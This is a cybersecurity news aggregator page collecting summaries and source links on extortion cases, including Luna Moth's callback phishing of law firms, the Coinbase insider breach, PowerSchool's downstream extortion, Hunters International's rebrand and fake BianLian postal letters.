CyberSecurity news

FlagThis - #extortion

Pierluigi Paganini@Security Affairs //

FBI Warns Law Firms of Stealth Phishing Attacks - The FBI warns law firms about the Silent Ransom Group (Luna Moth), which uses IT-themed social engineering and phishing tactics to steal data for extortion.
The FBI has issued a warning to U.S. law firms regarding an escalating cyber threat posed by the Silent Ransom Group (SRG), also known as Luna Moth or Chatty Spider. This group, active since 2022, has refined its tactics to target law firms specifically since early 2023, likely due to the valuable and confidential client data they possess. The group aims to gain unauthorized access to systems and devices in order to steal sensitive information and extort victims with threats of public data leaks.

SRG's methods include IT-themed social engineering calls and callback phishing emails. In these attacks, they impersonate IT personnel to deceive employees into granting remote access to systems. They may direct the employee to a malicious website or send a link via email that installs remote access software. Once inside, the attackers discreetly extract sensitive files using tools like WinSCP or disguised versions of Rclone. This campaign is particularly dangerous because it leaves minimal digital traces and can bypass traditional security measures.

To defend against these attacks, the FBI urges law firms to enhance staff training to recognize and avoid social engineering tactics. Implementing multi-factor authentication is crucial, as is proactive monitoring for unauthorized access attempts. The agency also advises that victims share any ransom evidence with law enforcement to aid in investigations. Furthermore, CISOs are encouraged to fortify help desk and employee defenses, enhance intrusion detection and tracking capabilities, and recognize that paying ransoms is not a viable strategy.

Recommended read:
References :
  • DataBreaches.Net: DataBreaches.net issues a Private Industry Notification about the Silent Ransom Group targeting law firms.
  • securityaffairs.com: SecurityAffairs reports on Silent Ransom Group targeting law firms, the FBI warns.
  • The DefendOps Diaries: The DefendOps Diaries explores the Silent Ransom Group's new era of cyber extortion.
  • bsky.app: The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks.
  • BleepingComputer: FBI warns of Luna Moth extortion attacks targeting law firms
  • ciso2ciso.com: Silent Ransom Group targeting law firms, the FBI warns – Source: securityaffairs.com
  • hackread.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls
  • databreaches.net: Private Industry Notification: Silent Ransom Group Targeting Law Firms
  • Security Affairs: The FBI warns that the Silent Ransom Group, active since 2022 and also known as Luna Moth, has targeted U.S. law firms using phishing and social engineering. Linked to BazarCall campaigns, the group previously […]
  • ciso2ciso.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls – Source:hackread.com
  • malware.news: Private Industry Notification: Silent Ransom Group Targeting Law Firms
  • ciso2ciso.com: FBI warns law firms: Silent Ransom Group uses phishing emails and fake IT calls to steal data, demanding ransom to prevent public leaks.
  • gbhackers.com: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
  • malware.news: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
  • The Hacker News: The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims
  • gbhackers.com: The Federal Bureau of Investigation (FBI) has issued a critical alert regarding the escalating activities of the cyber threat actor known as Silent Ransom Group (SRG), also identified under aliases such as Luna Moth, Chatty Spider, and UNC3753.
  • Tech Monitor: The FBI alerts law firms to rising threat of Silent Ransom Group’s extortion tactics
  • thecyberexpress.com: FBI Warns about Silent Ransom Group Targeting Law Firms
  • eSecurity Planet: The FBI warns law firms of a stealth phishing scam where hackers call victims, pose as IT staff, and use remote access tools to steal sensitive data.
  • www.scworld.com: US law firms facing Luna Moth ransomware threat
  • cyble.com: FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
  • www.esecurityplanet.com: FBI Warns Law Firms: Hackers Are Calling Offices in Stealth Phishing Scam
  • cyble.com: FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
  • www.techradar.com: FBI warns legal firms of Luna Moth extortion attacks where hackers will call their office
Dissent@DataBreaches.Net //

Coinbase Data Breach Due to Bribed Support Agents - Coinbase disclosed a data breach from bribed overseas support agents, leading to a $20 million extortion attempt and potential costs between $180 million and $400 million for remediation and customer reimbursement.
Coinbase recently disclosed a significant data breach resulting from a bribery scheme targeting overseas customer support agents. The breach, which came to light after a $20 million ransom demand, involved rogue contractors who abused their access to exfiltrate customer data. Coinbase has confirmed that these contractors, located outside the United States, were successfully bribed by cybercriminals to access internal systems and steal sensitive information. Upon discovering the unauthorized activity, Coinbase terminated the involved personnel and initiated a thorough internal investigation.

The compromised data, affecting less than 1% of Coinbase's monthly transacting users, includes names, addresses, phone numbers, email addresses, and the last four digits of Social Security numbers. Additionally, masked bank account numbers, some banking identifiers, government-issued ID images such as driver's licenses and passports, and account data including balance snapshots and transaction histories were exposed. Importantly, Coinbase has stated that no passwords, private keys, or access to customer funds were compromised, and Coinbase Prime accounts and wallets were unaffected.

In response to the breach, Coinbase refused to pay the $20 million ransom and instead offered a $20 million reward for information leading to the identification and prosecution of those responsible. The company is also reimbursing customers who mistakenly sent funds to the scammers due to phishing attempts. Furthermore, Coinbase is taking several steps to enhance security, including stricter identity verification, scam-awareness prompts, relocating support functions to a U.S.-based hub, and improving fraud monitoring and insider threat detection capabilities. This incident could potentially cost Coinbase between $180 million and $400 million for remediation and customer reimbursement.

Recommended read:
References :
  • DataBreaches.Net: Coinbase says hackers bribed staff to steal customer data and are demanding $20 million ransom
  • fortune.com: Coinbase puts $20 million bounty on crooks who tried to extort firm over stolen customer data
  • BleepingComputer: Coinbase, a cryptocurrency exchange with over 100 million customers, has disclosed that cybercriminals working with rogue support agents stole customer data and demanded a $20 million ransom not to publish the stolen information.
  • techcrunch.com: Coinbase says customers’ personal information stolen in data breach. The crypto exchange giant said the hacker was "paying multiple contractors or employees working in support roles," and contacted Coinbase with a ransom demand this week with stolen data, which Coinbase says is "credible."
  • BleepingComputer: Coinbase data breach exposes customer info and government IDs
  • www.bleepingcomputer.com: Coinbase Discloses Breach, Faces Up to $400 Million in Losses
  • The Register - Security: Coinbase says some of its overseas support staff were paid off to steal information on behalf of cybercriminals, and the company is now being extorted for $20 million.
  • Zack Whittaker: Coinbase CEO says the hacker demanded $20 million in a ransom payment not to publish the stolen data. A Coinbase spokesperson tells me that less than 1% of its monthly customers are affected.
  • techxplore.com: Coinbase, the largest cryptocurrency exchange based in the U.S., said Thursday that criminals had improperly obtained personal data on the exchange's customers for use in crypto-stealing scams and were demanding a $20 million payment not to publicly release the info.
  • Metacurity: Hacking incident could cost Coinbase $400 million, $20 million reward offered
  • securityaffairs.com: Coinbase disclosed a data breach after an extortion attempt
  • thecyberexpress.com: Coinbase details insider data theft that led to a $20 million ransom demand. In a and , Coinbase – the third largest crypto exchange by volume – said it will reimburse any customers tricked into sending funds to the attacker.
  • The Hacker News: The Hacker News reports on Coinbase agents being bribed.
  • Secure Bulletin: Coinbase, one of the world’s largest cryptocurrency exchanges with over 100 million customers, has disclosed a significant data breach orchestrated through insider collusion.
  • cyberinsider.com: Coinbase Hit by Insider Breach and Extortion, User Data Compromised
  • securebulletin.com: Coinbase faces major Data Breach: $400 Million in potential losses
  • www.metacurity.com: Hacking incident could cost Coinbase $400 million, $20 million reward offered
  • Zack Whittaker: Coinbase says it was breached, and customers' personal information stolen. The crypto giant said the hacker was "paying multiple contractors or employees working in support roles," and contacted Coinbase with a ransom demand this week with stolen data, which Coinbase says is "credible."
  • The DefendOps Diaries: Inside the Coinbase Breach: Lessons in Cybersecurity
  • techxplore.com: Coinbase on Thursday said criminals bribed and duped their way to stealing cryptocurrency from its users, then tried to blackmail the exchange to keep the crime quiet.
  • Risky Business Media: Risky Bulletin: Coinbase reveals insider breach, extortion attempt
  • hackread.com: Coinbase Customer Info Stolen by Bribed Overseas Agents
  • techcrunch.com: Coinbase says customers’ personal information stolen in data breach
  • www.techradar.com: Personal information leaked in Coinbase cyberattack, cost could be $400 million
  • Security Latest: Coinbase Will Reimburse Customers Up to $400 Million After Data Breach
  • Matthew Rosenquist: This is how you handle digital extortion! Cybercriminals attempted to extort $20 million from Coinbase, but Coinbase refused and will instead fund a $20 million bounty for those that provide information that leads to the attacker’s arrest!
  • Cybersecurity Blog: Cracking the Coinbase Breach: What Went Wrong and What We Can Learn
  • www.cybersecuritydive.com: The crypto exchange is offering a $20 million reward for information leading to the hackers’ arrest. Coinbase terminated customer support agents who leaked customer data.
  • Threats | CyberScoop: Coinbase flips $20M extortion demand into bounty for info on attackers
  • Bitcoin News: Coinbase says it might cost between $180 million and $400 million to upgrade its security measures and reimburse lost funds.
  • www.csoonline.com: Coinbase ( ), the largest crypto exchange in the US, is offering a $20 million bounty for information leading to those behind a May 2025 breach that compromised customer data.
  • cyberscoop.com: Coinbase is offering a $20 million reward for information leading to the hackers’ arrest.
  • www.cybersecurity-insiders.com: Coinbase, one of the largest cryptocurrency exchanges, has disclosed a significant data breach that exposed sensitive customer information, including government-issued IDs. The attackers contacted Coinbase on May 11, demanding a $20 million ransom to prevent the public release of the stolen data.
  • hackernoon.com: Contractor Backdoor: Coinbase Faces $400M Blow in Major Data Breach
Dissent@DataBreaches.Net //

PowerSchool Data Breach Leads to Continued Extortion of School Districts - PowerSchool, an education technology firm, experienced a major data breach in December 2024, and even after paying a ransom, the threat actor resurfaced and directly extorted individual school districts with the stolen data.
In December 2024, PowerSchool, a major provider of K-12 software serving 60 million students across North America, experienced a significant data breach. Hackers gained access to sensitive student and teacher data, including personally identifiable information such as Social Security numbers and health data, through a single stolen credential. The company, believing it was the best course of action, paid an undisclosed ransom to the threat actor to prevent the data from being made public, however this has proven to be unsuccessful.

Months later, it has been revealed that the threat actors are now directly targeting individual school districts with extortion demands, using the stolen data from the initial breach. The Toronto District School Board (TDSB), along with other schools in North America, has confirmed receiving ransom demands from the attackers. The exposed information includes names, contact details, birth dates, Social Security numbers, and even some medical alert data. PowerSchool has confirmed that these extortion attempts are related to the original breach and is working with law enforcement.

Cybersecurity experts have warned against paying ransoms, as there is no guarantee that hackers will delete the stolen data. This case exemplifies the risk of paying extortion demands, as the threat actors have resurfaced to revictimize affected individuals and institutions with additional demands. PowerSchool is offering two years of free identity protection to affected individuals, however there will be pressure for them to improve its security and reassure stakeholders that it can prevent similar incidents in the future.

Recommended read:
References :
  • bsky.app: The hacker behind PowerSchool's December breach is now extorting schools, threatening to release stolen student and teacher data.
  • Threats | CyberScoop: The large education tech vendor was hit by a cyberattack and paid a ransom in December. Now, a threat actor is attempting to extort the company’s customers with stolen data.
  • The Register - Security: PowerSchool paid thieves to delete stolen student, teacher data. Crooks may have lied
  • The DefendOps Diaries: Report discussing the PowerSchool data breach and its implications.
  • BleepingComputer: PowerSchool is warning that the hacker behind its December cyberattack is now individually extorting schools, threatening to release the previously stolen student and teacher data if a ransom is not paid. [...]
  • www.bleepingcomputer.com: BleepingComputer reports on PowerSchool hacker extorting school districts.
  • cyberscoop.com: PowerSchool customers hit by downstream extortion threats
  • BleepingComputer: PowerSchool hacker now extorting individual school districts
  • malware.news: PowerSchool paid a hacker’s extortion demand, but now school district clients are being extorted anyway (2)
  • DataBreaches.Net: PowerSchool paid a hacker’s extortion demand, but now school district clients are being extorted anyway (3)
  • PCMag UK security: UK PCMag covers PowerSchool attackers extorting teachers.
  • go.theregister.com: PowerSchool paid thieves to delete stolen student, teacher data. Crooks may have lied Now individual school districts extorted by fiends
  • Metacurity: PowerSchool hackers are extorting schools despite the company's ransom payment
  • techcrunch.com: TechCrunch article on PowerSchool being hacked.
  • hackread.com: PowerSchool Paid Ransom, Now Hackers Target Teachers for More
  • ExpressVPN Blog: Teachers report that bad actors are now targeting them with threatening emails demanding payment following a massive 2024 breach affecting schools across the US and Canada. One of the largest hacks of US schools continues as teachers across the country say that threat actors are extorting them for more money and threatening to release the data.
  • www.metacurity.com: PowerSchool hackers are extorting schools despite the company's ransom payment
  • thecyberexpress.com: Toronto School Board Hit with Extortion Demand After PowerSchool Data Breach
  • Blog: PowerSchool clients now targeted directly by threat actor
  • cyberinsider.com: PowerSchool Ransom Fallout: Extortion Attempts Hit Schools Months After Data Breach
  • www.techradar.com: PowerSchool hackers return, and may not have deleted stolen data as promised
  • malware.news: Double-extortion tactics used in PowerSchool ransomware attack
  • CyberInsider: Months after paying a ransom to suppress the fallout of a major data breach, PowerSchool is facing renewed turmoil as threat actors have begun extorting individual school districts using the same stolen data.
  • Matthew Rosenquist: More extortions, same - a perfect example of how not to deal with risks. The nightmare continues for schools, students, and teachers who's private data was exposed by PowerSchool.
  • matthewrosenquist.substack.com: PowerSchool data breach round 2 extortions
  • aboutdfir.com: Reports an education tech provider paid thieves to delete stolen student, teacher data.
  • MeatMutts: The educational sector has been rocked by a significant data breach involving PowerSchool, a leading education technology provider serving over 60 million students globally.
  • aboutdfir.com: PowerSchool paid thieves to delete stolen student, teacher data. Looks like crooks lied An education tech provider that paid a ransom to prevent the leak of stolen student and teacher data is now watching its school district customers get individually extorted by either the same ransomware crew that hit it – or someone connected to
Sergiu Gatlan@BleepingComputer //

Hunters International Shifts to Data Extortion - Hunters International, a ransomware-as-a-service (RaaS) group, has shifted its focus from ransomware to data extortion, rebranding itself as "World Leaks."
The Ransomware-as-a-Service (RaaS) group Hunters International has reportedly shifted its focus from ransomware to data extortion, rebranding itself as "World Leaks" on January 1, 2025. This change in tactics signals a new era in cybercrime, driven by the declining profitability of ransomware and increased scrutiny from law enforcement and governments worldwide. Group-IB researchers revealed that the group's senior personnel decided ransomware was becoming too "unpromising, low-converting, and extremely risky," leading to the development of an extortion-only operation.

The group is reportedly leveraging custom-built exfiltration tools to automate data theft from victim networks, enhancing their ability to carry out extortion-only attacks. Cybersecurity researchers have also linked Hunters International to the infamous Hive ransomware group. There are suggestions that they acquired Hive’s source code and operational tools. While Hunters International denies being a direct continuation of Hive, evidence suggests that they acquired Hive’s source code and operational tools. The group targets various industries, including healthcare, real estate, and professional services, across North America, Europe, and Asia.

Recommended read:
References :
  • The DefendOps Diaries: Hunters International's shift to data extortion: a new era in cybercrime.
  • BleepingComputer: The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to date theft and extortion-only attacks.
  • Cyber Security News: Hunters International Linked to Hive Ransomware in Attacks on Windows, Linux, and ESXi Systems
  • The Register - Security: Crimelords at Hunters International tell lackeys ransomware too 'risky'
  • securityboulevard.com: Details of the rebranding and shift in focus to extortion by Hunters International.
  • bsky.app: The Hunters International ransomware group is shutting down and rebranding as World Leaks – an extortion-only operation.
  • The420.in: The ransomware-as-a-service (RaaS) operation Hunters International has announced a strategic pivot—shutting down its encryption-based ransomware campaigns and rebranding as a new extortion-only group known as “World Leaks.â€
Shira Landau@Email Security - Blog //

FBI Warns of Fake BianLian Extortion Letters - The FBI warns of a data extortion scam where criminals impersonate the BianLian ransomware group, sending physical letters demanding Bitcoin to corporate executives, but analysis suggests the letters are fraudulent.
The FBI has issued a warning regarding a new data extortion scam where criminals are impersonating the BianLian ransomware group. These fraudsters are sending physical letters through the United States Postal Service to corporate executives, claiming their networks have been breached. The letters demand Bitcoin payments in exchange for preventing the release of sensitive company data.

Analysis suggests these letters are fraudulent, and organizations, particularly within the US healthcare sector, are advised to report such incidents to the FBI. Security vendors, including Arctic Wolf and Guidepoint Security, have studied these letters and believe the campaign is a ruse by someone pretending to be BianLian. The letters mimic conventional ransom notes, demanding payments of between $250,000 to $350,000 within 10 days.

This activity highlights the evolving tactics of cybercriminals who are now employing postal mail to target high-profile individuals in an attempt to extort money under false pretenses. The FBI urges companies to implement internal protocols for verifying ransom demands and to remain vigilant against these deceptive practices. It’s crucial for organizations to discern fake attacks from real ones amidst the increasing complexity of cybercrime.

Recommended read:
References :
  • Arctic Wolf: Self-Proclaimed “BianLian Groupâ€� Uses Physical Mail to Extort Organizations
  • CyberInsider: Fake BianLian Ransom Notes Delivered to Executives via Post Mail
  • DataBreaches.Net: Bogus ‘BianLian’ Gang Sends Snail-Mail Extortion Letters
  • www.csoonline.com: Ransomware goes postal: US healthcare firms receive fake extortion letters
  • PCMag UK security: Businesses Are Receiving Snail Mail Ransomware Threats, But It's a Scam
  • BrianKrebs: Someone has been snail mailing letters to various businesses pretending to be the BianLian ransomware group.
  • Cyber Security News: FBI Warns of Data Extortion Scam Targeting Corporate Executives
  • gbhackers.com: FBI Warns: Threat Actors Impersonating BianLian Group to Target Corporate Executives
  • techcrunch.com: There is no confirmed link between the campaign and the actual BianLian ransomware group, making this an elaborate impersonation.
  • thecyberexpress.com: FBI Issues Urgent Warning About Data Extortion Scam Targeting Corporate Executives
  • Email Security - Blog: The U.S. Federal Bureau of Investigation (FBI) has recently released an urgent advisory pertaining to a sophisticated email-based extortion campaign.
  • Threats | CyberScoop: The FBI is warning business leaders about the scam perpetrated by an unidentified threat group.
  • gbhackers.com: The novel approach highlights a shift in extortion tactics.
  • Vulnerable U: Executives Receive Fake Snail Mail BianLian Ransomware Notes
  • Malwarebytes: Ransomware threat mailed in letters to business owners
  • www.scworld.com: The FBI is warning of a ransomware operation targeting C-suite executives via the US Postal Service.
  • Cyber Security News: Fake BianLian Ransom Scams Target U.S. Firms Through Mailed Letters
  • borncity.com: CISA warning: Cyber criminals (BianLian Groupe) attempt to blackmail executives
  • Jon Greig: The FBI warned executives of a new scam where people claiming to be part of the BianLian ransomware gang are mailing physical letters with threats Arctic Wolf said it is aware of at least 20 organizations or executives who have received these letters
  • Kali Linux Tutorials: Cyber Threat Group Sends Paper-Based Extortion Letters
  • The DefendOps Diaries: Cybercriminals exploit YouTube's copyright system to extort creators, spreading malware and demanding ransoms.
  • www.bleepingcomputer.com: Cybercriminals are sending bogus copyright claims to YouTubers to coerce them into promoting malware and cryptocurrency miners on their videos.

Posts

Blogs

Research Tools